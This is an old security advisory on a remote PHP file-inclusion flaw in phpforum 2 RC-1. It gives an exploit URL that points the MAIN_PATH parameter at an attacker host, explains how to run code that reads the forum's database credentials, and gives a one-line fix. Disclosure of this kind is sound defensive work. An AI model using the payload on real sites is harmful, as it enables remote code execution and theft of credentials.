|
================================================ <------------------------------------------------> <------------#www.bright-shadows.net#------------> <------------------------------------------------> <--------------#theblacksheep&erik#--------------> <------------------------------------------------> ================================================ Advisory Information -------------------- Advisory Name : PHP-Include-Hack-Possibility in phpforum 2 RC-1 Author : Marc Bromm <theblacksheep@fastmail.fm> Germany Discover by : Marc Bromm <theblacksheep@fastmail.fm> Germany Release Date : 10. Juli 2003 Application : phpforum 2 RC-1 Vendor Homepage : http://www.phpmyforum.de/ Vendor Status : notified Vulnerable Versions: phpforum 2 RC-1 (maybe older) Platforms : OS Independent, PHP Severity : High ######Overview: The phpforum is a mySQL based forum with a lot of functions. ######Exploit: 1. Exploitable file The exploitable file is the "mainfile.php". The first 2 lines are: ---------------------------------------- <?php include("$MAIN_PATH/config.php"); //Konfiguration ---------------------------------------- So it is possible to set $MAIN_PATH to everything. For example: -> www.victim.com/forum/mainfile.php?MAIN_PATH=http://www.attack.com Then you need only a "config.php" file with the code you like to execute. So you can get for example the SQL server password and the username which are stored in the "config.inc.php" file. But it is necessary that the attacking webserver (evilhost) can't be running PHP or the code will be run on the attacking machine rather than the target machine. ######Solution: Change ----------------------------------- include("$MAIN_PATH/config.php"); //Konfiguration ----------------------------------- to ----------------------------------- include("config.php"); //Konfiguration ----------------------------------- cause the config file is in the same folder as the mainfile. Greetz to: Erik, (O_o)oOoOoOo. -- theblacksheep@fastmail.fm -- http://www.fastmail.fm - mmm... Fastmail...